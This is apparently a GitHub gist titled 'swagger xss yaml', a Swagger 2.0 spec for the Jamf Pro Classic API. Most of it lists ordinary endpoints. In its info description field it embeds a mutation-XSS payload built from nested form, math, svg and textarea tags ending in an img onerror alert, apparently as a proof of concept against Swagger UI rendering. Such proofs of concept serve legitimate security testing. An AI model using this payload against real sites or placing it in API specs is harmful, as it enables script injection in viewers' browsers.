Skip to content

Instantly share code, notes, and snippets.

@danzajork
Created May 17, 2022 12:02
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save danzajork/c89dd2a92088567386a474bcdd22df0a to your computer and use it in GitHub Desktop.
Save danzajork/c89dd2a92088567386a474bcdd22df0a to your computer and use it in GitHub Desktop.
swagger xss yaml - new
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
'/accounts/groupid/{id}':
delete:
parameters:
- description: |
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: deleteGroupById
summary: Deletes a group by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findGroupsById
summary: Finds groups by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- accounts
description: 'You cannot create an LDAP group with a POST. '
operationId: createGroupById
summary: Creates a new group by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
description: You cannot change information for an LDAP group with a PUT.
operationId: updateGroupById
summary: Updates an existing group by id
'/accounts/groupname/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- accounts
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findGroupsByName
summary: Finds groups by name
'/accounts/userid/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: deleteUserById
summary: Deletes a user by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findUsersById
summary: Finds users by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- accounts
description: 'You cannot create an LDAP account or assign a password with a POST. '
operationId: createUserById
summary: Creates a new user by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
description: You cannot change information in an LDAP account or change a password with a PUT.
operationId: updateUserById
summary: Updates an existing user by id
'/accounts/username/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- accounts
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findUsersByName
summary: Finds users by name
/activationcode:
get:
responses:
'200':
description: No response was specified
tags:
- activationcode
operationId: findactivationcode
summary: Finds the Jamf Pro activation code
put:
responses:
'200':
description: No response was specified
tags:
- activationcode
operationId: updateActivationCode
summary: Updates the Jamf Pro activation code
/advancedcomputersearches:
get:
responses:
'200':
description: No response was specified
tags:
- advancedcomputersearches
operationId: findAdvancedComputerSearches
summary: Finds all advanced computer searches
'/advancedcomputersearches/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedcomputersearches
operationId: deleteAdvancedComputerSearchById
summary: Deletes a computer search by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedcomputersearches
operationId: findAdvancedComputerSearchesById
summary: Finds computer searches by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- advancedcomputersearches
operationId: createAdvancedComputerSearchgById
summary: Creates a new advanced computer search by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedcomputersearches
operationId: updateAdvancedComputerSearchById
summary: Updates an existing advanced computer search by id
'/advancedcomputersearches/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- advancedcomputersearches
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputerSearchesByName
summary: Finds computer searches by name
/advancedmobiledevicesearches:
get:
responses:
'200':
description: No response was specified
tags:
- advancedmobiledevicesearches
operationId: findAdvancedMobileDeviceSearches
summary: Finds all advanced mobile device searches
'/advancedmobiledevicesearches/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedmobiledevicesearches
operationId: deleteAdvancedMobileDeviceSearchById
summary: Deletes a mobile device search by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedmobiledevicesearches
operationId: findAdvancedMobileDeviceSearchesById
summary: Finds mobile device searches by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- advancedmobiledevicesearches
operationId: createAdvancedMobileDeviceSearchById
summary: Creates a new advanced mobile device search by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedmobiledevicesearches
operationId: updateAdvancedMobileDeviceSearchById
summary: Updates an existing advanced mobile device search by id
'/advancedmobiledevicesearches/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- advancedmobiledevicesearches
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceSearchesByName
summary: Finds mobile device searches by name
/advancedusersearches:
get:
responses:
'200':
description: No response was specified
tags:
- advancedusersearches
operationId: findAdvancedUserSearches
summary: Finds all advanced user searches
'/advancedusersearches/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedusersearches
operationId: deleteAdvancedUserSearchById
summary: Deletes a user search by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedusersearches
operationId: findAdvancedUserSearchesById
summary: Finds user searches by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- advancedusersearches
operationId: createAdvancedUserSearchgById
summary: Creates a new advanced user search by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- advancedusersearches
operationId: updateAdvancedUserSearchById
summary: Updates an existing advanced user search by id
'/advancedusersearches/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- advancedusersearches
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findUserSearchesByName
summary: Finds user searches by name
/allowedfileextensions:
get:
responses:
'200':
description: No response was specified
tags:
- allowedfileextensions
operationId: findAllowedFileExtension
summary: Finds the allowed file extension
'/allowedfileextensions/extension/{extension}':
get:
parameters:
- description: String value of extension
in: path
name: extension
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- allowedfileextensions
operationId: findAllowedFileExtensionByName
summary: Finds an allowed file extension value by name
'/allowedfileextensions/id/{id}':
delete:
parameters:
- description: Database id of the extension
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- allowedfileextensions
operationId: deleteAllowedFileExtensionById
summary: Deletes an allowed file extension value by id
get:
parameters:
- description: Database id of the extension
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- allowedfileextensions
operationId: findAllowedFileExtensionById
summary: Finds an allowed file extension value by id
post:
parameters:
- description: Database id of the extension
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- allowedfileextensions
operationId: createAllowedFileExtensionById
summary: Creates a new allowed file extension value by id
/buildings:
get:
responses:
'200':
description: No response was specified
tags:
- buildings
operationId: findBuildings
summary: Finds all buildings
'/buildings/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- buildings
operationId: deleteBuildingById
summary: Deletes a building by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- buildings
operationId: findBuildingsById
summary: Finds buildings by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- buildings
operationId: createBuildingById
summary: Creates a new building by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- buildings
operationId: updateBuildingById
summary: Updates an existing building by id
'/buildings/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- buildings
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findBuildingsByName
summary: Finds buildings by name
/byoprofiles:
get:
responses:
'200':
description: No response was specified
tags:
- byoprofiles
operationId: findBYOProfiles
summary: Finds all byoprofiles
'/byoprofiles/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- byoprofiles
operationId: findBYOProfilesById
summary: Finds personal device profile by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- byoprofiles
description: You cannot reassign the site since it is maintained by Jamf Pro.
operationId: updateBYOProfilesById
summary: Updates an existing byoprofile by id
'/byoprofiles/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- byoprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findBYOProfilesByName
summary: Finds the first byoprofile with the given name
'/byoprofiles/site/id/{siteId}':
get:
parameters:
- description: Site id to filter by
in: path
name: siteId
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- byoprofiles
description: You can PUT using this resource URL.
operationId: findBYOProfilesBySiteId
summary: Finds byoprofiles by site id
'/byoprofiles/site/name/{siteName}':
get:
parameters:
- description: Site name to filter by
in: path
name: siteName
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- byoprofiles
description: You can PUT using this resource URL.
operationId: findBYOProfilesBySiteName
summary: Finds byoprofiles by site name
/categories:
get:
responses:
'200':
description: No response was specified
tags:
- categories
operationId: findCategories
summary: Finds all categories
'/categories/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- categories
operationId: deleteCategoryById
summary: Deletes a category by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- categories
operationId: findCategoriesById
summary: Finds categories by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- categories
operationId: createCategoryById
summary: Creates a new category by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- categories
operationId: updateCategoryById
summary: Updates an existing category by id
'/categories/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- categories
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findCategoriesByName
summary: Finds categories by name
/classes:
get:
responses:
'200':
description: No response was specified
tags:
- classes
operationId: findClasses
summary: Finds all classes
'/classes/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- classes
operationId: deleteClassById
summary: Deletes a class by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- classes
operationId: findClassesById
summary: Finds classes by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- classes
operationId: createClassById
summary: 'Creates a new class by id. The mobile device list is not used in the POST, the mobile device group is used instead.'
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- classes
operationId: updateClassById
summary: 'Updates an existing class by id. The mobile device list is not used in the POST, the mobile device group is used instead.'
'/classes/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- classes
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findClassesByName
summary: Finds classes by name
/commandflush:
delete:
responses:
'200':
description: No response was specified
tags:
- commandflush
description: 'Status and devices specified in an XML file. Id lists may be specified for <computers>, <computer_groups>, <mobile_devices>, <mobile_device_groups>. Sample file: <commandflush><status>Pending+Failed</status><mobile_devices><mobile_device><id>1</id></mobile_device><mobile_device><id>2</id></mobile_device></mobile_devices></commandflush>'
operationId: commandFlush
summary: Flushes commands based on information specified in an XML file.
'/commandflush/{idtype}/id/{id}/status/{status}':
delete:
parameters:
- description: Type of device to be flushed.
in: path
name: idtype
required: true
type: string
- description: Id of device to be flushed.
in: path
name: id
required: true
type: string
- description: Status to be flushed.
in: path
name: status
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- commandflush
description: 'Status may be Pending, Failed, or Pending+Failed. idtype may be specified as computers, computergroups, mobiledevices, or mobiledevicegroups. Multiple devices may be specified by separating identifiers with commas. For example /computers/id/1,2,3/status/Pending+Failed'
operationId: createCommandFlushWithIdAndStatus
summary: 'Flushes commands for computers, computergroups, mobiledevices, or mobiledevicegroups.'
'/computerapplications/application/{application}':
get:
parameters:
- description: Application name to filter by
in: path
name: application
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplications
description: 'Name may be specified using the same format as the general search in Jamf Pro. For example, /computerapplications/application/Safari*'
operationId: findComputerApplicationsByName
summary: Finds computer applications by name
'/computerapplications/application/{application}/inventory/{inventory}':
get:
parameters:
- description: Application name to filter by
in: path
name: application
required: true
type: string
- default: 'Asset Tag,Platform'
description: Inventory options
in: path
name: inventory
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplications
description: 'Inventory values may be displayed in addition to computer identification information. Use Default to view the same fields as those checked for Inventory Display, otherwise list display fields separated by commas. For example, computerapplications/application/Safari.app/inventory/HostName,Platform,Bar%20Code or computerapplications/application/Safari.app/inventory/Default. This interface will substitute %20 for blank spaces.'
operationId: findComputerApplicationsByNameInventory
summary: Finds computer applications by name and generates additional inventory display
'/computerapplications/application/{application}/version/{version}':
get:
parameters:
- description: Application name to filter by
in: path
name: application
required: true
type: string
- description: Version to filter by
in: path
name: version
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplications
description: 'Version may be specified using the same format as the general search in Jamf Pro. For example, /computerapplications/application/Safari.app/version/9*'
operationId: findComputerApplicationByNameAndVersion
summary: Finds computer applications by name and version
'/computerapplications/application/{application}/version/{version}/inventory/{inventory}':
get:
parameters:
- description: Application name to filter by
in: path
name: application
required: true
type: string
- description: Version to filter by
in: path
name: version
required: true
type: string
- default: Default
description: Inventory options
in: path
name: inventory
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplications
description: 'Inventory values may be displayed in addition to computer identification information. Use Default to view the same fields as those checked for Inventory Display, otherwise list display fields separated by commas. For example, computerapplications/application/Safari.app/inventory/HostName,Platform,Bar%20Code or computerapplications/application/Safari.app/inventory/Default. This interface will substitute %20 for blank spaces.'
operationId: findComputerApplicationsByNameAndVersionAndInventory
summary: 'Finds computer applications by name and version, and generates additional inventory display'
'/computerapplicationusage/id/{id}/{start_date}_{end_date}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End datey
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplicationusage
description: 'Displays application usage information for the date range specified for a computer specified with the {id} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerapplicationusage/id/33/2016-01-01_2016-12-31'
operationId: findComputerApplicationUsageById
summary: Finds computer application usage by computer id
'/computerapplicationusage/macaddress/{macaddress}/{start_date}_{end_date}':
get:
parameters:
- description: mac address to filter by
in: path
name: macaddress
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End datey
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplicationusage
description: 'Displays application usage information for the date range specified for a computer specified with the {macaddress} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerapplicationusage/macaddress/14:14:14:14:14:14/2016-01-01_2016-12-31'
operationId: findComputerApplicationUsageByMacAddress
summary: Finds computer application usage by computer mac address
'/computerapplicationusage/name/{name}/{start_date}_{end_date}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End datey
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplicationusage
description: 'Displays application usage information for the date range specified for a computer specified with the {name} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerapplicationusage/name/XYZ123/2016-01-01_2016-12-31'
operationId: findComputerApplicationUsageByName
summary: Finds computer application usage by computer name
'/computerapplicationusage/serialnumber/{serialnumber}/{start_date}_{end_date}':
get:
parameters:
- description: Serial number to filter by
in: path
name: serialnumber
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End datey
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplicationusage
description: 'Displays application usage information for the date range specified for a computer specified with the {serialnumber} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerapplicationusage/serialnumber/C0Q10E7KDKQ1/2016-01-01_2016-12-31'
operationId: findComputerApplicationUsageBySerial
summary: Finds computer application usage by computer serial number
'/computerapplicationusage/udid/{udid}/{start_date}_{end_date}':
get:
parameters:
- description: UDID to filter by
in: path
name: udid
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End datey
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerapplicationusage
description: 'Displays application usage information for the date range specified for a computer specified with the {udid} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerapplicationusage/udid/ABC1FE75-144A-5F66-944B-8D37B6CFABCD/2016-01-01_2016-12-31'
operationId: findComputerApplicationUsageByUDID
summary: Finds computer application usage by computer UDID
/computercheckin:
get:
responses:
'200':
description: No response was specified
tags:
- computercheckin
operationId: findComputerCheckin
summary: Finds the Jamf Pro computer checkin information
put:
responses:
'200':
description: No response was specified
tags:
- computercheckin
operationId: updateComputerCheckin
summary: Updates the Jamf Pro computer checkin information
/computercommands:
get:
responses:
'200':
description: No response was specified
tags:
- computercommands
operationId: findComputerCommands
summary: Finds all computer commands
'/computercommands/command/{command}':
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
description: Command and computer list specified in an XML file. DeviceLock and EraseDevice require a 6 character passcode. UnlockUserAccount and DeleteUser require a user_name that reflects a local account that is to be unlocked or removed. Command uuid and date_sent are set by Jamf Pro.
operationId: createComputerCommandByCommand
summary: 'Creates a new computer command. Commands supported: DeviceLock, EraseDevice, UnmanageDevice, BlankPush, UnlockUserAccount, DeleteUser, SettingsEnableBluetooth, SettingsDisableBluetooth (macOS 10.13.4 and later), EnableRemoteDesktop (macOS 10.14.4 and later), DisableRemoteDesktop (macOS 10.14.4 and later), ScheduleOSUpdate.'
'/computercommands/command/{command}/action/{action}/id/{id}':
post:
parameters:
- description: 'Id of computer,or computers if a comma-separated list, to which to send the command'
in: path
name: id
required: true
type: string
- description: 'Command specific action. For example, for a ScheduleOSUpdate command, users can set the action to ''install'' to automatically attempt to install updates.'
in: path
name: action
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
description: 'Command uuid and date_sent are set by Jamf Pro. Id is used to specify a single computer, or multiple computers separated by commas, such as id/33 or id/33,34.'
operationId: createComputerCommandByCommandAndAction
summary: 'Creates a new computer command with a command specific action. Commands supported: ScheduleOSUpdate.'
'/computercommands/command/{command}/id/{id}':
post:
parameters:
- description: Id of computer or computers to send command to
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
description: 'Command uuid and date_sent are set by Jamf Pro. Id is used to specify a single computer, or multiple computers separated by commas, such as id/33 or id/33,34'
operationId: createComputerCommandByCommandShortcut1
summary: 'Creates a new computer command. Commands supported: UnmanageDevice, BlankPush, SettingsEnableBluetooth, SettingsDisableBluetooth (macOS 10.13.4 and later), EnableRemoteDesktop (macOS 10.14.4 and later), DisableRemoteDesktop (macOS 10.14.4 and later), ScheduleOSUpdate.'
'/computercommands/command/{command}/passcode/{passcode}/id/{id}':
post:
parameters:
- description: Id of computer or computers to send command to
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
description: 'Command uuid and date_sent are set by Jamf Pro. DeviceLock and EraseDevice require a 6 character passcode. Id is used to specify a single computer, or multiple computers separated by commas, such as id/33 or id/33,34'
operationId: createComputerCommandByCommandShortcut2
summary: 'Creates a new computer command. Commands supported: DeviceLock, EraseDevice.'
'/computercommands/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
operationId: findComputerCommandsByName
summary: Finds matching computer commands by name.
'/computercommands/status/{statusuuid}':
get:
parameters:
- description: Command UUID value to filter by
in: path
name: statusuuid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
description: A command waiting to execute will have a Pending status. A command that has failed will have an Error status. A command that has been canceled will have a Canceled status and will not be available using the other GET options.
operationId: findComputerCommandStatusByUuid
summary: Finds a computer command status by uuid
'/computercommands/uuid/{uuid}':
get:
parameters:
- description: UUID value to filter by
in: path
name: uuid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computercommands
operationId: findComputerCommandsByUuid
summary: Finds a computer command by uuid
/computerconfigurations:
get:
responses:
'200':
description: No response was specified
tags:
- computerconfigurations
operationId: findComputerConfigurations
summary: Finds all computer configurations
'/computerconfigurations/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerconfigurations
operationId: deleteComputerConfigurationById
summary: Deletes a computer configuration by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerconfigurations
operationId: findComputerConfigurationsById
summary: Finds computer configurations by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerconfigurations
description: 'Packages, scripts, printers, directory bindings must be specified prior to POST of a configuration.'
operationId: createComputerConfigurationById
summary: Creates a new computer configuration by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerconfigurations
description: 'Packages, scripts, printers, directory bindings must be specified prior to PUT of a configuration.'
operationId: updateComputerConfigurationById
summary: Updates an existing computer configuration by id
'/computerconfigurations/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerconfigurations
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputerConfigurationsByName
summary: Finds computer configurations by name
/computerextensionattributes:
get:
responses:
'200':
description: No response was specified
tags:
- computerextensionattributes
operationId: findComputerextensionattributes
summary: Finds all computer extension attributes
'/computerextensionattributes/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerextensionattributes
operationId: deleteComputerextensionattributeById
summary: Deletes a computer extension attribute by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerextensionattributes
operationId: findComputerextensionattributesById
summary: Finds computer extension attributes by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerextensionattributes
operationId: createComputerextensionattributeById
summary: Creates a new computer extension attribute by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computerextensionattributes
operationId: updateComputerextensionattributeById
summary: Updates an existing computer extension attribute by id
'/computerextensionattributes/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerextensionattributes
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputerextensionattributesByName
summary: Finds computer extension attributes by name
/computergroups:
get:
responses:
'200':
description: No response was specified
tags:
- computergroups
operationId: findComputerGroups
summary: Finds all computer groups
'/computergroups/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computergroups
operationId: deleteComputerGroupById
summary: Deletes a computer group by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computergroups
operationId: findComputerGroupsById
summary: Finds computer groups by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computergroups
description: 'POST also works with a name, but generally id is used.'
operationId: createComputerGroupById
summary: Creates a new computer group by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- computergroups
description: PUT also works with a name. One or more computers can be added by using <computer_additions> instead of <computers>. One or more computers can be deleted by using <computer_deletions> instead of <computers>
operationId: updateComputerGroupById
summary: Updates an existing computer group by id
'/computergroups/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computergroups
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findComputerGroupsByName
summary: Finds computer groups by name
'/computerhardwaresoftwarereports/id/{id}/{start_date}_{end_date}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End date
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhardwaresoftwarereports
description: 'Displays hardware/software reports for the date range specified for a computer specified with the {id} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerhardwaresoftwarereports/id/33/2016-01-01_2016-12-31'
operationId: findComputerHardwareSoftwareReportsById
summary: Finds hardware/software reports by computer id
'/computerhardwaresoftwarereports/id/{id}/{start_date}_{end_date}/subset/{subset}':
get:
parameters:
- description: Computer Id to filter by
in: path
name: id
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End date
in: path
name: end_date
required: true
type: string
- default: Hardware
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhardwaresoftwarereports
description: 'Displays information specified with the {subset} parameter for a computer specified with the {id} parameter. Lookup by name, UDID, serial number, or mac address are also supported. Start and end date are required. For example, /computerhardwaresoftwarereports/id/3/2016-01-01_2016-12-31/subset/Software or /computerhardwaresoftwarereports/id/3/2016-01-01_2016-12-31/subset/Fonts&Plugins.'
operationId: findComputerHistoryByIdSubset
summary: Display subsets of information for computer hardware/software history
'/computerhardwaresoftwarereports/macaddress/{macaddress}/{start_date}_{end_date}':
get:
parameters:
- description: mac address to filter by
in: path
name: macaddress
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End date
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhardwaresoftwarereports
description: 'Displays hardware/software reports for the date range specified for a computer specified with the {macaddress} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerhardwaresoftwarereports/macaddress/14:14:14:14:14:14/2016-01-01_2016-12-31'
operationId: findComputerHardwareSoftwareReportsByMacAddress
summary: Finds hardware/software reports by computer mac address
'/computerhardwaresoftwarereports/name/{name}/{start_date}_{end_date}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End date
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- computerhardwaresoftwarereports
description: 'Displays hardware/software reports for the date range specified for a computer specified with the {name} parameter. Date range must be specified in format yyyy-mm-dd. For example, ../JSSResource/computerhardwaresoftwarereports/name/XYZ123/2016-01-01_2016-12-31'
operationId: findComputerHardwareSoftwareReportsByName
summary: Finds hardware/software reports by computer name
'/computerhardwaresoftwarereports/serialnumber/{serialnumber}/{start_date}_{end_date}':
get:
parameters:
- description: Serial number to filter by
in: path
name: serialnumber
required: true
type: string
- default: '2016-01-01'
description: Start date
in: path
name: start_date
required: true
type: string
- default: '2016-12-31'
description: End date
in: path
name: end_date
required: true
type: string
responses:
'200':
description: No response was specified
tags:
